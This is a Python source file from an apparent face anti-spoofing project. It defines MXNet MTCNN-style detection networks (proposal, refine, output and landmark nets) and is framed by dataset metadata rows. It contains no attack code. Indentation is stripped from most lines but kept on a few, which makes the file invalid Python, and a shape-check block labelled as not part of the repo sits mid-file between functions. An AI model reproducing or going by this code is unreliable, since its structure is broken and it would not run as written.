] | 1 | 2020-04-28T02:18:29.000Z | 2020-04-28T02:18:29.000Z | train-mtcnn-zq-mxnet/core/symbol.py | zzzkk2009/anti-spoofing | ac3992547c430619e236b338575109d7ecbba654 | [
"MIT"
] | 5 | 2018-12-19T07:43:48.000Z | 2020-06-15T12:14:41.000Z | import mxnet as mx
import negativemining
import negativemining_landmark
import negativemining_onlylandmark
from config import config
def P_Net20(mode='train'):
"""
    Proposal Network
    input shape 3 x 20 x 20
"""
data = mx.symbol.Variable(name="data")
bbox_target = mx.symbol.Variable(name="bbox_target")
label = mx.symbol.Variable(name="label")
conv1 = mx.symbol.Convolution(data=data, kernel=(3, 3), stride=(2,2), num_filter=8, name="conv1", no_bias=True)
bn1 = mx.sym.BatchNorm(data=conv1, name='bn1', fix_gamma=False,momentum=0.9)
prelu1 = mx.symbol.LeakyReLU(data=bn1, act_type="prelu", name="prelu1")
#cur size: 9x9
conv2_dw = mx.symbol.Convolution(data=prelu1, kernel=(3, 3), num_filter=8, num_group=8, name="conv2_dw", no_bias=True)
bn2_dw = mx.sym.BatchNorm(data=conv2_dw, name='bn2_dw', fix_gamma=False,momentum=0.9)
prelu2_dw = mx.symbol.LeakyReLU(data=bn2_dw, act_type="prelu", name="prelu2_dw")
conv2_sep = mx.symbol.Convolution(data=prelu2_dw, kernel=(1, 1), num_filter=16, name="conv2_sep", no_bias=True)
bn2_sep = mx.sym.BatchNorm(data=conv2_sep, name='bn2_sep', fix_gamma=False,momentum=0.9)
prelu2 = mx.symbol.LeakyReLU(data=bn2_sep, act_type="prelu", name="prelu2")
#cur size: 7x7
conv3_dw = mx.symbol.Convolution(data=prelu2, kernel=(3, 3),stride=(2,2), num_filter=16, num_group=16, name="conv3_dw", no_bias=True)
bn3_dw = mx.sym.BatchNorm(data=conv3_dw, name='bn3_dw', fix_gamma=False,momentum=0.9)
prelu3_dw = mx.symbol.LeakyReLU(data=bn3_dw, act_type="prelu", name="prelu3_dw")
conv3_sep = mx.symbol.Convolution(data=prelu3_dw, kernel=(1, 1), num_filter=24, name="conv3_sep", no_bias=True)
bn3_sep = mx.sym.BatchNorm(data=conv3_sep, name='bn3_sep', fix_gamma=False,momentum=0.9)
prelu3 = mx.symbol.LeakyReLU(data=bn3_sep, act_type="prelu", name="prelu3")
#cur size: 3x3
conv4_dw = mx.symbol.Convolution(data=prelu3, kernel=(3, 3), num_filter=24, num_group=24, name="conv4_dw", no_bias=True)
bn4_dw = mx.sym.BatchNorm(data=conv4_dw, name='bn4_dw', fix_gamma=False,momentum=0.9)
prelu4_dw = mx.symbol.LeakyReLU(data=bn4_dw, act_type="prelu", name="prelu4_dw")
#cur size: 1x1
conv4_1 = mx.symbol.Convolution(data=prelu4_dw, kernel=(1, 1), num_filter=2, name="conv4_1")
conv4_2 = mx.symbol.Convolution(data=prelu4_dw, kernel=(1, 1), num_filter=4, name="conv4_2")
if mode == 'test':
cls_prob = mx.symbol.SoftmaxActivation(data=conv4_1, mode="channel", name="cls_prob")
bbox_pred = conv4_2
group = mx.symbol.Group([cls_prob, bbox_pred])
else:
conv4_1_reshape = mx.symbol.Reshape(data = conv4_1, shape=(-1, 2), name="conv4_1_reshape")
cls_prob = mx.symbol.SoftmaxOutput(data=conv4_1_reshape, label=label,
multi_output=True, use_ignore=True,
name="cls_prob")
conv4_2_reshape = mx.symbol.Reshape(data = conv4_2, shape=(-1, 4), name="conv4_2_reshape")
bbox_pred = mx.symbol.LinearRegressionOutput(data=conv4_2_reshape, label=bbox_target,
grad_scale=1, name="bbox_pred")
out = mx.symbol.Custom(cls_prob=cls_prob, label=label, bbox_pred=bbox_pred,bbox_target=bbox_target,
op_type='negativemining', name="negative_mining")
group = mx.symbol.Group([out])
return group
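# Minimal shape sanity check (an addition, not part of the repo): in test
# mode P_Net20 should map a 3x20x20 input to 1x1 score/bbox maps.
if __name__ == '__main__':
    sym = P_Net20(mode='test')
    _, out_shapes, _ = sym.infer_shape(data=(1, 3, 20, 20))
    print(out_shapes)  # expected: [(1, 2, 1, 1), (1, 4, 1, 1)]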
def R_Net(mode='train'):
"""
Refine Network
input shape 3 x 24 x 24
"""
data = mx.symbol.Variable(name="data")
bbox_target = mx.symbol.Variable(name="bbox_target")
label = mx.symbol.Variable(name="label")
conv1 = mx.symbol.Convolution(data=data, kernel=(3, 3), pad=(1,1), num_filter=16, name="conv1", no_bias=True)
bn1 = mx.sym.BatchNorm(data=conv1, name='bn1', fix_gamma=False,momentum=0.9)
prelu1 = mx.symbol.LeakyReLU(data=bn1, act_type="prelu", name="prelu1")
conv2_dw = mx.symbol.Convolution(data=prelu1, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=16, num_group=16, name="conv2_dw", no_bias=True)
bn2_dw = mx.sym.BatchNorm(data=conv2_dw, name='bn2_dw', fix_gamma=False,momentum=0.9)
prelu2_dw = mx.symbol.LeakyReLU(data=bn2_dw, act_type="prelu", name="prelu2_dw")
conv2_sep = mx.symbol.Convolution(data=prelu2_dw, kernel=(1, 1), num_filter=32, name="conv2_sep", no_bias=True)
bn2_sep = mx.sym.BatchNorm(data=conv2_sep, name='bn2_sep', fix_gamma=False,momentum=0.9)
prelu2 = mx.symbol.LeakyReLU(data=bn2_sep, act_type="prelu", name="prelu2")
conv3_dw = mx.symbol.Convolution(data=prelu2, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=32, num_group=32, name="conv3_dw", no_bias=True)
bn3_dw = mx.sym.BatchNorm(data=conv3_dw, name='bn3_dw', fix_gamma=False,momentum=0.9)
prelu3_dw = mx.symbol.LeakyReLU(data=bn3_dw, act_type="prelu", name="prelu3_dw")
conv3_sep = mx.symbol.Convolution(data=prelu3_dw, kernel=(1, 1), num_filter=64, name="conv3_sep", no_bias=True)
bn3_sep = mx.sym.BatchNorm(data=conv3_sep, name='bn3_sep', fix_gamma=False,momentum=0.9)
prelu3 = mx.symbol.LeakyReLU(data=bn3_sep, act_type="prelu", name="prelu3")
conv4_dw = mx.symbol.Convolution(data=prelu3, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=64, num_group=64, name="conv4_dw", no_bias=True)
bn4_dw = mx.sym.BatchNorm(data=conv4_dw, name='bn4_dw', fix_gamma=False,momentum=0.9)
prelu4_dw = mx.symbol.LeakyReLU(data=bn4_dw, act_type="prelu", name="prelu4_dw")
conv4_sep = mx.symbol.Convolution(data=prelu4_dw, kernel=(1, 1), num_filter=128, name="conv4_sep", no_bias=True)
bn4_sep = mx.sym.BatchNorm(data=conv4_sep, name='bn4_sep', fix_gamma=False,momentum=0.9)
prelu4 = mx.symbol.LeakyReLU(data=bn4_sep, act_type="prelu", name="prelu4")
conv5_dw = mx.symbol.Convolution(data=prelu4, kernel=(3, 3), num_filter=128, num_group=128, name="conv5_dw", no_bias=True)
bn5_dw = mx.sym.BatchNorm(data=conv5_dw, name='bn5_dw', fix_gamma=False,momentum=0.9)
prelu5_dw = mx.symbol.LeakyReLU(data=bn5_dw, act_type="prelu", name="prelu5_dw")
conv5_1 = mx.symbol.FullyConnected(data=prelu5_dw, num_hidden=2, name="conv5_1")
conv5_2 = mx.symbol.FullyConnected(data=prelu5_dw, num_hidden=4, name="conv5_2")
    cls_prob = mx.symbol.SoftmaxOutput(data=conv5_1, label=label, use_ignore=True,
                                       name="cls_prob")
    if mode == 'test':
bbox_pred = conv5_2
group = mx.symbol.Group([cls_prob, bbox_pred])
else:
bbox_pred = mx.symbol.LinearRegressionOutput(data=conv5_2, label=bbox_target,
grad_scale=1, name="bbox_pred")
out = mx.symbol.Custom(cls_prob=cls_prob, label=label, bbox_pred=bbox_pred, bbox_target=bbox_target,
op_type='negativemining', name="negative_mining")
group = mx.symbol.Group([out])
return group
def O_Net(mode="train", with_landmark = False):
"""
    Output Network
input shape 3 x 48 x 48
"""
data = mx.symbol.Variable(name="data")
bbox_target = mx.symbol.Variable(name="bbox_target")
label = mx.symbol.Variable(name="label")
if with_landmark:
type_label = mx.symbol.Variable(name="type_label")
landmark_target = mx.symbol.Variable(name="landmark_target")
conv1 = mx.symbol.Convolution(data=data, kernel=(3, 3),pad=(1,1), num_filter=32, name="conv1")
bn1 = mx.sym.BatchNorm(data=conv1, name='bn1', fix_gamma=False,momentum=0.9)
prelu1 = mx.symbol.LeakyReLU(data=bn1, act_type="prelu", name="prelu1")
conv2_dw = mx.symbol.Convolution(data=prelu1, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=32, num_group=32, name="conv2_dw", no_bias=True)
bn2_dw = mx.sym.BatchNorm(data=conv2_dw, name='bn2_dw', fix_gamma=False,momentum=0.9)
prelu2_dw = mx.symbol.LeakyReLU(data=bn2_dw, act_type="prelu", name="prelu2_dw")
conv2_sep = mx.symbol.Convolution(data=prelu2_dw, kernel=(1, 1), num_filter=64, name="conv2_sep", no_bias=True)
bn2_sep = mx.sym.BatchNorm(data=conv2_sep, name='bn2_sep', fix_gamma=False,momentum=0.9)
prelu2 = mx.symbol.LeakyReLU(data=bn2_sep, act_type="prelu", name="prelu2")
conv3_dw = mx.symbol.Convolution(data=prelu2, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=64, num_group=64, name="conv3_dw", no_bias=True)
bn3_dw = mx.sym.BatchNorm(data=conv3_dw, name='bn3_dw', fix_gamma=False,momentum=0.9)
prelu3_dw = mx.symbol.LeakyReLU(data=bn3_dw, act_type="prelu", name="prelu3_dw")
conv3_sep = mx.symbol.Convolution(data=prelu3_dw, kernel=(1, 1), num_filter=64, name="conv3_sep", no_bias=True)
bn3_sep = mx.sym.BatchNorm(data=conv3_sep, name='bn3_sep', fix_gamma=False,momentum=0.9)
prelu3 = mx.symbol.LeakyReLU(data=bn3_sep, act_type="prelu", name="prelu3")
conv4_dw = mx.symbol.Convolution(data=prelu3, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=64, num_group=64, name="conv4_dw", no_bias=True)
bn4_dw = mx.sym.BatchNorm(data=conv4_dw, name='bn4_dw', fix_gamma=False,momentum=0.9)
prelu4_dw = mx.symbol.LeakyReLU(data=bn4_dw, act_type="prelu", name="prelu4_dw")
conv4_sep = mx.symbol.Convolution(data=prelu4_dw, kernel=(1, 1), num_filter=128, name="conv4_sep", no_bias=True)
bn4_sep = mx.sym.BatchNorm(data=conv4_sep, name='bn4_sep', fix_gamma=False,momentum=0.9)
prelu4 = mx.symbol.LeakyReLU(data=bn4_sep, act_type="prelu", name="prelu4")
conv5_dw = mx.symbol.Convolution(data=prelu4, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=128, num_group=128, name="conv5_dw", no_bias=True)
bn5_dw = mx.sym.BatchNorm(data=conv5_dw, name='bn5_dw', fix_gamma=False,momentum=0.9)
prelu5_dw = mx.symbol.LeakyReLU(data=bn5_dw, act_type="prelu", name="prelu5_dw")
conv5_sep = mx.symbol.Convolution(data=prelu5_dw, kernel=(1, 1), num_filter=256, name="conv5_sep", no_bias=True)
bn5_sep = mx.sym.BatchNorm(data=conv5_sep, name='bn5_sep', fix_gamma=False,momentum=0.9)
prelu5 = mx.symbol.LeakyReLU(data=bn5_sep, act_type="prelu", name="prelu5")
conv6_dw = mx.symbol.Convolution(data=prelu5, kernel=(3, 3), num_filter=256, num_group=256, name="conv6_dw", no_bias=True)
bn6_dw = mx.sym.BatchNorm(data=conv6_dw, name='bn6_dw', fix_gamma=False,momentum=0.9)
prelu6_dw = mx.symbol.LeakyReLU(data=bn6_dw, act_type="prelu", name="prelu6_dw")
conv6_1 = mx.symbol.FullyConnected(data=prelu6_dw, num_hidden=2, name="conv6_1")
bn6_1 = mx.sym.BatchNorm(data=conv6_1, name='bn6_1', fix_gamma=False,momentum=0.9)
cls_prob = mx.symbol.SoftmaxOutput(data=bn6_1, label=label, use_ignore=True, name="cls_prob")
conv6_2 = mx.symbol.FullyConnected(data=prelu6_dw, num_hidden=4, name="conv6_2")
bn6_2 = mx.sym.BatchNorm(data=conv6_2, name='bn6_2', fix_gamma=False,momentum=0.9)
conv6_3 = mx.symbol.FullyConnected(data=prelu6_dw, num_hidden=10, name="conv6_3")
bn6_3 = mx.sym.BatchNorm(data=conv6_3, name='bn6_3', fix_gamma=False,momentum=0.9)
if mode == "test":
bbox_pred = bn6_2
landmark_pred = bn6_3
group = mx.symbol.Group([cls_prob, bbox_pred, landmark_pred])
else:
bbox_pred = mx.symbol.LinearRegressionOutput(data=bn6_2, label=bbox_target,
grad_scale=1, name="bbox_pred")
landmark_pred = mx.symbol.LinearRegressionOutput(data=bn6_3, label=landmark_target,
grad_scale=1, name="landmark_pred")
out = mx.symbol.Custom(cls_prob=cls_prob, label=label, bbox_pred=bbox_pred, bbox_target=bbox_target,
landmark_pred=landmark_pred, landmark_target=landmark_target,
type_label=type_label, op_type='negativemining_landmark', name="negative_mining")
group = mx.symbol.Group([out])
else:
conv1 = mx.symbol.Convolution(data=data, kernel=(3, 3),pad=(1,1), num_filter=16, name="conv1")
bn1 = mx.sym.BatchNorm(data=conv1, name='bn1', fix_gamma=False,momentum=0.9)
prelu1 = mx.symbol.LeakyReLU(data=bn1, act_type="prelu", name="prelu1")
conv2_dw = mx.symbol.Convolution(data=prelu1, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=16, num_group=16, name="conv2_dw", no_bias=True)
bn2_dw = mx.sym.BatchNorm(data=conv2_dw, name='bn2_dw', fix_gamma=False,momentum=0.9)
prelu2_dw = mx.symbol.LeakyReLU(data=bn2_dw, act_type="prelu", name="prelu2_dw")
conv2_sep = mx.symbol.Convolution(data=prelu2_dw, kernel=(1, 1), num_filter=32, name="conv2_sep", no_bias=True)
bn2_sep = mx.sym.BatchNorm(data=conv2_sep, name='bn2_sep', fix_gamma=False,momentum=0.9)
prelu2 = mx.symbol.LeakyReLU(data=bn2_sep, act_type="prelu", name="prelu2")
conv3_dw = mx.symbol.Convolution(data=prelu2, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=32, num_group=32, name="conv3_dw", no_bias=True)
bn3_dw = mx.sym.BatchNorm(data=conv3_dw, name='bn3_dw', fix_gamma=False,momentum=0.9)
prelu3_dw = mx.symbol.LeakyReLU(data=bn3_dw, act_type="prelu", name="prelu3_dw")
conv3_sep = mx.symbol.Convolution(data=prelu3_dw, kernel=(1, 1), num_filter=32, name="conv3_sep", no_bias=True)
bn3_sep = mx.sym.BatchNorm(data=conv3_sep, name='bn3_sep', fix_gamma=False,momentum=0.9)
prelu3 = mx.symbol.LeakyReLU(data=bn3_sep, act_type="prelu", name="prelu3")
conv4_dw = mx.symbol.Convolution(data=prelu3, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=32, num_group=32, name="conv4_dw", no_bias=True)
bn4_dw = mx.sym.BatchNorm(data=conv4_dw, name='bn4_dw', fix_gamma=False,momentum=0.9)
prelu4_dw = mx.symbol.LeakyReLU(data=bn4_dw, act_type="prelu", name="prelu4_dw")
conv4_sep = mx.symbol.Convolution(data=prelu4_dw, kernel=(1, 1), num_filter=64, name="conv4_sep", no_bias=True)
bn4_sep = mx.sym.BatchNorm(data=conv4_sep, name='bn4_sep', fix_gamma=False,momentum=0.9)
prelu4 = mx.symbol.LeakyReLU(data=bn4_sep, act_type="prelu", name="prelu4")
conv5_dw = mx.symbol.Convolution(data=prelu4, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=64, num_group=64, name="conv5_dw", no_bias=True)
bn5_dw = mx.sym.BatchNorm(data=conv5_dw, name='bn5_dw', fix_gamma=False,momentum=0.9)
prelu5_dw = mx.symbol.LeakyReLU(data=bn5_dw, act_type="prelu", name="prelu5_dw")
conv5_sep = mx.symbol.Convolution(data=prelu5_dw, kernel=(1, 1), num_filter=128, name="conv5_sep", no_bias=True)
bn5_sep = mx.sym.BatchNorm(data=conv5_sep, name='bn5_sep', fix_gamma=False,momentum=0.9)
prelu5 = mx.symbol.LeakyReLU(data=bn5_sep, act_type="prelu", name="prelu5")
conv6_dw = mx.symbol.Convolution(data=prelu5, kernel=(3, 3), num_filter=128, num_group=128, name="conv6_dw", no_bias=True)
bn6_dw = mx.sym.BatchNorm(data=conv6_dw, name='bn6_dw', fix_gamma=False,momentum=0.9)
prelu6_dw = mx.symbol.LeakyReLU(data=bn6_dw, act_type="prelu", name="prelu6_dw")
conv6_1 = mx.symbol.FullyConnected(data=prelu6_dw, num_hidden=2, name="conv6_1")
bn6_1 = mx.sym.BatchNorm(data=conv6_1, name='bn6_1', fix_gamma=False,momentum=0.9)
cls_prob = mx.symbol.SoftmaxOutput(data=bn6_1, label=label, use_ignore=True, name="cls_prob")
conv6_2 = mx.symbol.FullyConnected(data=prelu6_dw, num_hidden=4, name="conv6_2")
bn6_2 = mx.sym.BatchNorm(data=conv6_2, name='bn6_2', fix_gamma=False,momentum=0.9)
if mode == "test":
bbox_pred = bn6_2
group = mx.symbol.Group([cls_prob, bbox_pred])
else:
bbox_pred = mx.symbol.LinearRegressionOutput(data=bn6_2, label=bbox_target,
grad_scale=1, name="bbox_pred")
out = mx.symbol.Custom(cls_prob=cls_prob, label=label, bbox_pred=bbox_pred, bbox_target=bbox_target,
op_type='negativemining', name="negative_mining")
group = mx.symbol.Group([out])
return group
def L_Net(mode="train"):
"""
    Landmark Network
input shape 3 x 48 x 48
"""
data = mx.symbol.Variable(name="data")
landmark_target = mx.symbol.Variable(name="landmark_target")
conv1 = mx.symbol.Convolution(data=data, kernel=(3, 3),pad=(1,1), num_filter=32, name="conv1")
bn1 = mx.sym.BatchNorm(data=conv1, name='bn1', fix_gamma=False,momentum=0.9)
prelu1 = mx.symbol.LeakyReLU(data=bn1, act_type="prelu", name="prelu1")
conv2_dw = mx.symbol.Convolution(data=prelu1, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=32, num_group=32, name="conv2_dw", no_bias=True)
bn2_dw = mx.sym.BatchNorm(data=conv2_dw, name='bn2_dw', fix_gamma=False,momentum=0.9)
prelu2_dw = mx.symbol.LeakyReLU(data=bn2_dw, act_type="prelu", name="prelu2_dw")
conv2_sep = mx.symbol.Convolution(data=prelu2_dw, kernel=(1, 1), num_filter=64, name="conv2_sep", no_bias=True)
bn2_sep = mx.sym.BatchNorm(data=conv2_sep, name='bn2_sep', fix_gamma=False,momentum=0.9)
prelu2 = mx.symbol.LeakyReLU(data=bn2_sep, act_type="prelu", name="prelu2")
conv3_dw = mx.symbol.Convolution(data=prelu2, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=64, num_group=64, name="conv3_dw", no_bias=True)
bn3_dw = mx.sym.BatchNorm(data=conv3_dw, name='bn3_dw', fix_gamma=False,momentum=0.9)
prelu3_dw = mx.symbol.LeakyReLU(data=bn3_dw, act_type="prelu", name="prelu3_dw")
conv3_sep = mx.symbol.Convolution(data=prelu3_dw, kernel=(1, 1), num_filter=64, name="conv3_sep", no_bias=True)
bn3_sep = mx.sym.BatchNorm(data=conv3_sep, name='bn3_sep', fix_gamma=False,momentum=0.9)
prelu3 = mx.symbol.LeakyReLU(data=bn3_sep, act_type="prelu", name="prelu3")
conv4_dw = mx.symbol.Convolution(data=prelu3, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=64, num_group=64, name="conv4_dw", no_bias=True)
bn4_dw = mx.sym.BatchNorm(data=conv4_dw, name='bn4_dw', fix_gamma=False,momentum=0.9)
prelu4_dw = mx.symbol.LeakyReLU(data=bn4_dw, act_type="prelu", name="prelu4_dw")
conv4_sep = mx.symbol.Convolution(data=prelu4_dw, kernel=(1, 1), num_filter=128, name="conv4_sep", no_bias=True)
bn4_sep = mx.sym.BatchNorm(data=conv4_sep, name='bn4_sep', fix_gamma=False,momentum=0.9)
prelu4 = mx.symbol.LeakyReLU(data=bn4_sep, act_type="prelu", name="prelu4")
conv5_dw = mx.symbol.Convolution(data=prelu4, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=128, num_group=128, name="conv5_dw", no_bias=True)
bn5_dw = mx.sym.BatchNorm(data=conv5_dw, name='bn5_dw', fix_gamma=False,momentum=0.9)
prelu5_dw = mx.symbol.LeakyReLU(data=bn5_dw, act_type="prelu", name="prelu5_dw")
conv5_sep = mx.symbol.Convolution(data=prelu5_dw, kernel=(1, 1), num_filter=256, name="conv5_sep", no_bias=True)
bn5_sep = mx.sym.BatchNorm(data=conv5_sep, name='bn5_sep', fix_gamma=False,momentum=0.9)
prelu5 = mx.symbol.LeakyReLU(data=bn5_sep, act_type="prelu", name="prelu5")
conv6_dw = mx.symbol.Convolution(data=prelu5, kernel=(3, 3), num_filter=256, num_group=256, name="conv6_dw", no_bias=True)
bn6_dw = mx.sym.BatchNorm(data=conv6_dw, name='bn6_dw', fix_gamma=False,momentum=0.9)
prelu6_dw = mx.symbol.LeakyReLU(data=bn6_dw, act_type="prelu", name="prelu6_dw")
conv6_3 = mx.symbol.FullyConnected(data=prelu6_dw, num_hidden=10, name="conv6_3")
bn6_3 = mx.sym.BatchNorm(data=conv6_3, name='bn6_3', fix_gamma=False,momentum=0.9)
if mode == "test":
landmark_pred = bn6_3
group = mx.symbol.Group([landmark_pred])
else:
landmark_pred = mx.symbol.LinearRegressionOutput(data=bn6_3, label=landmark_target,
grad_scale=1, name="landmark_pred")
out = mx.symbol.Custom(landmark_pred=landmark_pred, landmark_target=landmark_target,
op_type='negativemining_onlylandmark', name="negative_mining")
group = mx.symbol.Group([out])
    return group
| 67.571429 | 156 | 0.677565 | 3,214 | 20,339 | 4.067517 | 0.037026 | 0.085673 | 0.053545 | 0.068844 | 0.954104 | 0.946378 | 0.933986 | 0.931309 | 0.905607 | 0.901859 | 0 | 0.05842 | 0.168494 | 20,339 | 301 | 157 | 67.571429 | 0.714581 | 0.010423 | 0 | 0.800847 | 0 | 0 | 0.086193 | 0.002494 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016949 | false | 0 | 0.021186 | 0 | 0.055085 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |